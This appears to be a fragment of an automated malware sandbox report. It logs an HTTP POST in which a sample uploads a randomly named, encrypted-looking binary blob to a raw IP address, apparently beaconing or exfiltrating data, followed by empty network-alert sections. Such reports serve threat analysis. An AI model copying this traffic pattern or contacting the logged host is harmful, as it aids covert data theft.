Content-Type: multipart/form-data; boundary=------------------ee3zQ4bGK0M3GHsSBL
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 142.44.137.67:443
Content-Length: 4500
Connection: Keep-Alive
Cache-Control: no-cache


--------------------ee3zQ4bGK0M3GHsSBL
Content-Disposition: form-data; name="xegpocrwamluq"; filename="fiokvdjyczv"
Content-Type: application/octet-stream

@\xfd\xeb\x07\x08;\xa9\x08\x0c\x85\xef\xa4"'\xacr7E\xe4\x1a\x12Y
g\x0byXf\x94p4\x1b \x9c\x8f\xe64'{
\x88\xec\x89Y\xc8\x92\x15\xaem\xc1\xce\x9fZ\xee&\x19\xe0\x81\x01}\x0b\x10\xe9\xba\x90p\x86\x13Sj)\x06\xba"1\x1e\xae\xa3\x00\xad\x9c.\x96h\xac\xf3uFp\x05\xf8~\x0b\x8b\x9c@\xbc;?n\x94\xd4\xf6~{G0\xd8\xc1\xe2\x90\x0c6\x9f8;zw\xa0v\xdaD<O7\xfe\xf5X1*"\xadA\xa1\xa1\xee6mi\x94\x18\x02*\x11;\x7f\x19\xeb\x06\xeb)|"\x81k\xeb\B\xb4\x93\xcd\xb5\xde8+<|\xcb\x8c\x85\x02\x91\xcd|\xf4J\xb5\x15\x9aEi\xee[o\xf2\xda\xd3\x1a\xa4
\x1d\x18\x90\x90\xf36sZ\x17\xa5Kw\x1c4\xbd\xdf\x1b}
\xbe\x17\x05\xa2\x08\xb3\xfd\x86 \xbd)\x8a\xa3\x95&\x158_\x8e\xdc7\xfbw\x87X\xf0rS\xb71\xca\xa7\x0b\xb2\x90\xd7\xcf\x9a\xdd\xf8\x95l\x14\x11_\x92\x05\x8c\x97\xfc\xe6\x1b\xf7\x86\x81\xdf\xe5g\xa6\x87om\xd4\xa9!\x85tF\xd3\x1d\x81\x8e\xbdO\xae\x93\x15dI3\xa5\xdcdu\xd5YEd"\x80\x93\x9d(\xad\x07@\x94\xcf\xc7\xad\x1e\x89^\xc9\xbe\x99\xc5O\xef\x7f:\xccGU\xefy\x7f\x19\x95\x1f>Yl&\x8c\xd0\xc7\xbb\x19\xfek\xf1V\xcbd\x97\x11\x94\xbb\xe1\xa10=\xf7\x97\xfc4\x96\xd41\xcfj\x04\x1cf\xcc\xe8f\xa4\xe52\x8e\xee\x13\xa2\xd1\xf5\x827$m\xac\xaf\xb5\x01\x00A/\x1f\x80\xba\xe4\xe7\x8b\xa4\xde\x06/{\x19;\xb0s\xa1\xe8
--------------------ee3zQ4bGK0M3GHsSBL--\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.

Sorry! No dropped buffers.